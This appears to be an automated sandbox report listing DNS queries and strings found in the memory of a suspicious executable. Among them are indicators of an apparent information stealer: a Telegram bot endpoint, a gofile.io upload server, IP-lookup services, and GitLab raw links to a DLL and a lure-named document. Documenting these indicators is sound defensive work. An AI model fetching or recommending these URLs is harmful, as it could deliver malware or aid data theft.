href="https://www.google.com/intl/en/about/products?tab=wh" aria-haspopup=true aria-owns=gbd><span class=gbtb2></span><span id=gbztms class="gbts gbtsa"><span id=gbztms1>More</span><span class=gbma></span></span></a><script nonce='A9tJJcBwmSBNDXqhILB-MQ'>document.getElementById('gbztm').addEventListener('click', function clickHandler() { gbar.tg(event,this); });</script><div class=gbm id=gbd aria-owner=gbztm><div id=gbmmb class="gbmc gbsb gbsbis"><ol id=gbmm class="gbmcc gbsbic"><li class=gbmtc><a class=gbmt id=gb_24 href="https://calendar.google.com/calendar?tab=wc">Calendar</a></li><li class=gbmtc><a class=gbmt id=gb_51 href="https://translate.google.com/?hl=en&tab=wT">Translate</a></li><li class=gbmtc><a class=gbmt id=gb_17 href="http://www.google.com/mobile/?hl=en&tab=wD">Mobile</a></li><li class=gbmtc><a class=gbmt id=gb_10 href="https://books.google.com/?hl=en&tab=wp">Books</a></li><li class=gbmtc><a class=gbmt id=gb_6 href="https://www.google.com/shopping?hl=en&source=og&tab=wf">Shopping</a></li><li class=gbmtc><a class=gbmt id=gb_30 href="https://www.blogger.com/?tab=wj">Blogger</a></li><li class=gbmtc><a class=gbmt id=gb_27 href="https://www.google.com/finance?tab=we">Finance</a></li><li class=gbmtc><a class=gbmt id=gb_31 href="https://photos.google.com/?tab=wq&pageId=none">Photos</a></li><li class=gbmtc><a class=gbmt id=gb_25 href="https://docs.google.com/document/?usp=docs_alc">Docs</a></li><li class=gbmtc><div class="gbmt gbmh"></div></li><li class=gbmtc><a href="https://www.google.com/intl/en/about/products?tab=wh" class=gbmt>Even more &raquo;</a><script nonce='A9tJJcB
      Source: global trafficDNS traffic detected: DNS query: gitlab.com
      Source: global trafficDNS traffic detected: DNS query: google.com
      Source: global trafficDNS traffic detected: DNS query: www.google.com
      Source: global trafficDNS traffic detected: DNS query: api.ipify.org
      Source: global trafficDNS traffic detected: DNS query: ip-api.com
      Source: nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1C79000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org:443/
      Source: nNnzvybxiy.exe, 00000000.00000000.1249663619.00007FF6795DA000.00000002.00000001.01000000.00000003.sdmp, nNnzvybxiy.exe, 00000000.00000000.1249663619.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmp, nNnzvybxiy.exe, 00000000.00000002.1577546621.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
      Source: nNnzvybxiy.exe, 00000000.00000000.1249663619.00007FF6795DA000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertCSRSA4096RootG5.crt0E
      Source: nNnzvybxiy.exe, 00000000.00000000.1249663619.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmp, nNnzvybxiy.exe, 00000000.00000002.1577546621.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
      Source: nNnzvybxiy.exe, 00000000.00000000.1249663619.00007FF6795DA000.00000002.00000001.01000000.00000003.sdmp, nNnzvybxiy.exe, 00000000.00000000.1249663619.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmp, nNnzvybxiy.exe, 00000000.00000002.1577546621.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
      Source: nNnzvybxiy.exe, 00000000.00000000.1249663619.00007FF6795DA000.00000002.00000001.01000000.00000003.sdmp, nNnzvybxiy.exe, 00000000.00000000.1249663619.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmp, nNnzvybxiy.exe, 00000000.00000002.1577546621.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
      Source: nNnzvybxiy.exe, 00000000.00000000.1249663619.00007FF6795DA000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA2.crt0
      Source: nNnzvybxiy.exe, 00000000.00000000.1249663619.00007FF6795DA000.00000002.00000001.01000000.00000003.sdmp, nNnzvybxiy.exe, 00000000.00000000.1249663619.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmp, nNnzvybxiy.exe, 00000000.00000002.1577546621.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
      Source: nNnzvybxiy.exe, 00000000.00000000.1249663619.00007FF6795DA000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertCSRSA4096RootG5.crl0
      Source: nNnzvybxiy.exe, 00000000.00000000.1249663619.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmp, nNnzvybxiy.exe, 00000000.00000002.1577546621.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
      Source: nNnzvybxiy.exe, 00000000.00000000.1249663619.00007FF6795DA000.00000002.00000001.01000000.00000003.sdmp, nNnzvybxiy.exe, 00000000.00000000.1249663619.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmp, nNnzvybxiy.exe, 00000000.00000002.1577546621.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
      Source: nNnzvybxiy.exe, 00000000.00000002.1577546621.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
      Source: nNnzvybxiy.exe, 00000000.00000000.1249663619.00007FF6795DA000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0F
      Source: nNnzvybxiy.exe, 00000000.00000000.1249663619.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmp, nNnzvybxiy.exe, 00000000.00000002.1577546621.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
      Source: nNnzvybxiy.exe, 00000000.00000000.1249663619.00007FF6795DA000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0=
      Source: nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1F25000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://gitlab.com:443/
      Source: nNnzvybxiy.exe, 00000000.00000002.1577285512.00007FF67885C000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://ip-api.com/json/
      Source: nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1C79000.00000004.00001000.00020000.00000000.sdmp, nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1D12000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/8.46.123.189p?
      Source: nNnzvybxiy.exe, 00000000.00000002.1577546621.00007FF679802000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://ip-api.com/json/y
      Source: nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1C79000.00000004.00001000.00020000.00000000.sdmp, nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1D12000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com:80/
      Source: nNnzvybxiy.exe, 00000000.00000000.1249663619.00007FF6795DA000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://james.newtonking.com/projects/json
      Source: nNnzvybxiy.exe, 00000000.00000000.1249663619.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmp, nNnzvybxiy.exe, 00000000.00000002.1577546621.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://ocsp.digicert.com0
      Source: nNnzvybxiy.exe, 00000000.00000000.1249663619.00007FF6795DA000.00000002.00000001.01000000.00000003.sdmp, nNnzvybxiy.exe, 00000000.00000000.1249663619.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmp, nNnzvybxiy.exe, 00000000.00000002.1577546621.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://ocsp.digicert.com0A
      Source: nNnzvybxiy.exe, 00000000.00000000.1249663619.00007FF6795DA000.00000002.00000001.01000000.00000003.sdmp, nNnzvybxiy.exe, 00000000.00000000.1249663619.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmp, nNnzvybxiy.exe, 00000000.00000002.1577546621.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://ocsp.digicert.com0C
      Source: nNnzvybxiy.exe, 00000000.00000000.1249663619.00007FF6795DA000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://ocsp.digicert.com0O
      Source: nNnzvybxiy.exe, 00000000.00000000.1249663619.00007FF6795DA000.00000002.00000001.01000000.00000003.sdmp, nNnzvybxiy.exe, 00000000.00000000.1249663619.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmp, nNnzvybxiy.exe, 00000000.00000002.1577546621.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://ocsp.digicert.com0X
      Source: nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1DA1000.00000004.00001000.00020000.00000000.sdmp, nNnzvybxiy.exe, 00000000.00000002.1574674815.000001DBF2083000.00000004.00001000.00020000.00000000.sdmp, nNnzvybxiy.exe, 00000000.00000002.1574674815.000001DBF209E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://schema.org/WebPage
      Source: nNnzvybxiy.exe, 00000000.00000002.1577285512.00007FF67885C000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
      Source: nNnzvybxiy.exe, 00000000.00000002.1577546621.00007FF679802000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/Y
      Source: nNnzvybxiy.exe, 00000000.00000002.1577285512.00007FF67885C000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid
      Source: nNnzvybxiy.exe, 00000000.00000002.1577546621.00007FF679802000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidY
      Source: nNnzvybxiy.exe, 00000000.00000002.1577546621.00007FF679802000.00000002.00000001.01000000.00000003.sdmp, nNnzvybxiy.exe, 00000000.00000002.1577285512.00007FF67885C000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: nNnzvybxiy.exeString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name(DefaultRoleClaimTypexhttp://schemas.micro
      Source: nNnzvybxiy.exe, 00000000.00000002.1577285512.00007FF67885C000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
      Source: nNnzvybxiy.exe, 00000000.00000002.1577546621.00007FF679802000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/i
      Source: nNnzvybxiy.exe, 00000000.00000000.1249663619.00007FF6795DA000.00000002.00000001.01000000.00000003.sdmp, nNnzvybxiy.exe, 00000000.00000000.1249663619.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmp, nNnzvybxiy.exe, 00000000.00000002.1577546621.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.digicert.com/CPS0
      Source: nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1DED000.00000004.00001000.00020000.00000000.sdmp, nNnzvybxiy.exe, 00000000.00000002.1573250195.000001DBF1475000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/historw
      Source: nNnzvybxiy.exe, 00000000.00000002.1573250195.000001DBF1475000.00000004.00001000.00020000.00000000.sdmp, nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1DA1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/history/opt
      Source: nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1DA1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/history/optout?hl=en
      Source: nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1DA1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/mobile/?hl=en&tab=wD
      Source: nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1DA1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/preferences?hl=en
      Source: nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1DED000.00000004.00001000.00020000.00000000.sdmp, nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1E53000.00000004.00001000.00020000.00000000.sdmp, nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1EC3000.00000004.00001000.00020000.00000000.sdmp, nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1DA1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.google.com:443/
      Source: nNnzvybxiy.exe, 00000000.00000002.1573250195.000001DBF144C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/ServiceLogin?hl
      Source: nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1DA1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/ServiceLogin?hl=en&passive=true&continue=https://www.google.com/&ec=GAZA
      Source: nNnzvybxiy.exe, 00000000.00000002.1577546621.00007FF679802000.00000002.00000001.01000000.00000003.sdmp, nNnzvybxiy.exe, 00000000.00000002.1577285512.00007FF67885C000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/GlobalizationInvariantMode
      Source: nNnzvybxiy.exeString found in binary or memory: https://aka.ms/binaryformatter
      Source: nNnzvybxiy.exeString found in binary or memory: https://aka.ms/dotnet-illink/com
      Source: nNnzvybxiy.exeString found in binary or memory: https://aka.ms/dotnet-warnings/
      Source: nNnzvybxiy.exe, 00000000.00000002.1577285512.00007FF67885C000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/nativeaot-compatibility
      Source: nNnzvybxiy.exe, 00000000.00000002.1577546621.00007FF679802000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/nativeaot-compatibilityY
      Source: nNnzvybxiy.exe, 00000000.00000002.1577546621.00007FF679802000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/nativeaot-compatibilityy
      Source: nNnzvybxiy.exeString found in binary or memory: https://aka.ms/serializationformat-binary-obsolete
      Source: nNnzvybxiy.exe, 00000000.00000002.1577285512.00007FF67885C000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://api.gofile.io/servers
      Source: nNnzvybxiy.exe, 00000000.00000002.1577546621.00007FF679802000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://api.gofile.io/serversY
      Source: nNnzvybxiy.exe, 00000000.00000002.1577285512.00007FF67885C000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://api.ipify.org
      Source: nNnzvybxiy.exe, 00000000.00000002.1577546621.00007FF679802000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://api.ipify.orgY
      Source: nNnzvybxiy.exe, 00000000.00000002.1577285512.00007FF67885C000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://api.telegram.org/bot
      Source: nNnzvybxiy.exe, 00000000.00000002.1577546621.00007FF679802000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://api.telegram.org/boti
      Source: nNnzvybxiy.exe, 00000000.00000002.1573250195.000001DBF144C000.00000004.00001000.00020000.00000000.sdmp, nNnzvybxiy.exe, 00000000.00000002.1574674815.000001DBF2016000.00000004.00001000.00020000.00000000.sdmp, nNnzvybxiy.exe, 00000000.00000002.1574674815.000001DBF204C000.00000004.00001000.00020000.00000000.sdmp, nNnzvybxiy.exe, 00000000.00000002.1574674815.000001DBF2000000.00000004.00001000.00020000.00000000.sdmp, nNnzvybxiy.exe, 00000000.00000002.1574674815.000001DBF2068000.00000004.00001000.00020000.00000000.sdmp, nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1DED000.00000004.00001000.00020000.00000000.sdmp, nNnzvybxiy.exe, 00000000.00000002.1574674815.000001DBF20BA000.00000004.00001000.00020000.00000000.sdmp, nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1E53000.00000004.00001000.00020000.00000000.sdmp, nNnzvybxiy.exe, 00000000.00000002.1574674815.000001DBF20EC000.00000004.00001000.00020000.00000000.sdmp, nNnzvybxiy.exe, 00000000.00000002.1574674815.000001DBF20D0000.00000004.00001000.00020000.00000000.sdmp, nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1EC3000.00000004.00001000.00020000.00000000.sdmp, nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1F2B000.00000004.00001000.00020000.00000000.sdmp, nNnzvybxiy.exe, 00000000.00000002.1573250195.000001DBF1475000.00000004.00001000.00020000.00000000.sdmp, nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1DA1000.00000004.00001000.00020000.00000000.sdmp, nNnzvybxiy.exe, 00000000.00000002.1574674815.000001DBF2083000.00000004.00001000.00020000.00000000.sdmp, nNnzvybxiy.exe, 00000000.00000002.1574674815.000001DBF209E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
      Source: nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1DA1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://books.google.com/?hl=en&tab=wp
      Source: nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1DA1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://calendar.google.com/calendar?tab=wc
      Source: nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1F2B000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://collector.prd-278964.gl-product-analytics.com
      Source: nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1DA1000.00000004.00001000.00020000.00000000.sdmp, nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1D84000.00000004.00001000.00020000.00000000.sdmp, nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1D99000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp
      Source: nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1F2B000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://customers.gitlab.com
      Source: nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1DA1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/?usp=docs_alc
      Source: nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1DA1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?tab=wo
      Source: nNnzvybxiy.exe, 00000000.00000000.1249663619.00007FF6795DA000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/JamesNK/Newtonsoft.Json
      Source: nNnzvybxiy.exeString found in binary or memory: https://github.com/dotnet/efcore
      Source: nNnzvybxiy.exeString found in binary or memory: https://github.com/dotnet/linker/issues/2715.
      Source: nNnzvybxiy.exeString found in binary or memory: https://github.com/dotnet/runtime
      Source: nNnzvybxiy.exeString found in binary or memory: https://github.com/dotnet/runtime/issues/50820
      Source: nNnzvybxiy.exeString found in binary or memory: https://github.com/ericsink/SQLitePCL.raw
      Source: nNnzvybxiy.exe, 00000000.00000000.1249663619.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmp, nNnzvybxiy.exe, 00000000.00000002.1577546621.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/ericsink/SQLitePCL.rawX
      Source: nNnzvybxiy.exe, 00000000.00000000.1249663619.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmp, nNnzvybxiy.exe, 00000000.00000002.1577546621.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/ericsink/SQLitePCL.rawd
      Source: nNnzvybxiy.exeString found in binary or memory: https://github.com/icsharpcode/SharpZipLib3
      Source: nNnzvybxiy.exeString found in binary or memory: https://github.com/mono/linker/issues/1187
      Source: nNnzvybxiy.exeString found in binary or memory: https://github.com/mono/linker/issues/1416.
      Source: nNnzvybxiy.exeString found in binary or memory: https://github.com/mono/linker/issues/1731
      Source: nNnzvybxiy.exeString found in binary or memory: https://github.com/mono/linker/issues/1895vUsing
      Source: nNnzvybxiy.exeString found in binary or memory: https://github.com/mono/linker/issues/1906.
      Source: nNnzvybxiy.exeString found in binary or memory: https://github.com/mono/linker/issues/1981
      Source: nNnzvybxiy.exeString found in binary or memory: https://github.com/mono/linker/issues/2025
      Source: nNnzvybxiy.exeString found in binary or memory: https://github.com/mono/linker/pull/2125.
      Source: nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1F2B000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com
      Source: nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1F2B000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/-/sandbox/
      Source: nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1F2B000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/-/sandbox/;
      Source: nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1F2B000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/-/speedscope/index.html
      Source: nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1F2B000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/admin/
      Source: nNnzvybxiy.exe, 00000000.00000002.1577546621.00007FF679802000.00000002.00000001.01000000.00000003.sdmp, nNnzvybxiy.exe, 00000000.00000002.1577285512.00007FF67885C000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://gitlab.com/app8490744/updatesa/-/raw/main/Your_Benefits_and_Role.docx?inline=false
      Source: nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1F2B000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/assets/
      Source: nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1F25000.00000004.00001000.00020000.00000000.sdmp, nNnzvybxiy.exe, 00000000.00000002.1577546621.00007FF679802000.00000002.00000001.01000000.00000003.sdmp, nNnzvybxiy.exe, 00000000.00000002.1577285512.00007FF67885C000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://gitlab.com/hko247.black/libs/-/raw/da36e8916e710628358afbbd35fc9d73b2fd41c2/e_sqlite3.dll?in
      Source: nNnzvybxiy.exe, 00000000.00000002.1577546621.00007FF679802000.00000002.00000001.01000000.00000003.sdmp, nNnzvybxiy.exe, 00000000.00000002.1577285512.00007FF67885C000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://google.com
      Source: nNnzvybxiy.exe, 00000000.00000002.1573250195.000001DBF1475000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/defau
      Source: nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1DED000.00000004.00001000.00020000.00000000.sdmp, nNnzvybxiy.exe, 00000000.00000002.1573250195.000001DBF1475000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user
      Source: nNnzvybxiy.exe, 00000000.00000002.1574674815.000001DBF209E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24
      Source: nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1DA1000.00000004.00001000.00020000.00000000.sdmp, nNnzvybxiy.exe, 00000000.00000002.1574674815.000001DBF2083000.00000004.00001000.00020000.00000000.sdmp, nNnzvybxiy.exe, 00000000.00000002.1574674815.000001DBF209E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96
      Source: nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1DA1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?tab=wm
      Source: nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1DA1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://maps.google.com/maps?hl=en&tab=wl
      Source: nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1F2B000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://new-sentry.gitlab.net
      Source: nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1F2B000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://new-sentry.gitlab.net/api/4/security/?sentry_key=f5573e26de8f4293b285e556c35dfd6e&sentry_env
      Source: nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1DA1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://news.google.com/?tab=wn
      Source: nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1DA1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com/?tab=wq&pageId=none
      Source: nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1DA1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://play.google.com/?hl=en&tab=w8
      Source: nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1F2B000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sentry.gitlab.net
      Source: nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1F2B000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://snowplow.trx.gitlab.net
      Source: nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1F2B000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sourcegraph.com
      Source: nNnzvybxiy.exe, 00000000.00000002.1577546621.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://system.data.sqlite.org/
      Source: nNnzvybxiy.exe, 00000000.00000000.1249663619.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmp, nNnzvybxiy.exe, 00000000.00000002.1577546621.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://system.data.sqlite.org/X
      Source: nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1DA1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/?hl=en&tab=wT
      Source: nNnzvybxiy.exe, 00000000.00000000.1249663619.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmp, nNnzvybxiy.exe, 00000000.00000002.1577546621.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://urn.to/r/sds_see12https://urn.to/r/sds_see2
      Source: nNnzvybxiy.exe, 00000000.00000000.1249663619.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmp, nNnzvybxiy.exe, 00000000.00000002.1577546621.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://urn.to/r/sds_see23https://urn.to/r/sds_see1UInnerVerify
      Source: nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1DA1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.blogger.com/?tab=wj
      Source: nNnzvybxiy.exe, 00000000.00000002.1573250195.000001DBF1475000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
      Source: nNnzvybxiy.exe, 00000000.00000002.1573250195.000001DBF144C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/&ec=GAZAAQ
      Source: nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1DA1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/finance?tab=we
      Source: nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1DA1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/imghp?hl=en&tab=wi
      Source: nNnzvybxiy.exe, 00000000.00000002.1573250195.000001DBF1475000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl
      Source: nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1DED000.00000004.00001000.00020000.00000000.sdmp, nNnzvybxiy.exe, 00000000.00000002.1573250195.000001DBF1475000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/
      Source: nNnzvybxiy.exe, 00000000.00000002.1573250195.000001DBF1475000.00000004.00001000.00020000.00000000.sdmp, nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1DA1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/produE
      Source: nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1DA1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/products?tab=wh
      Source: nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1F2B000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
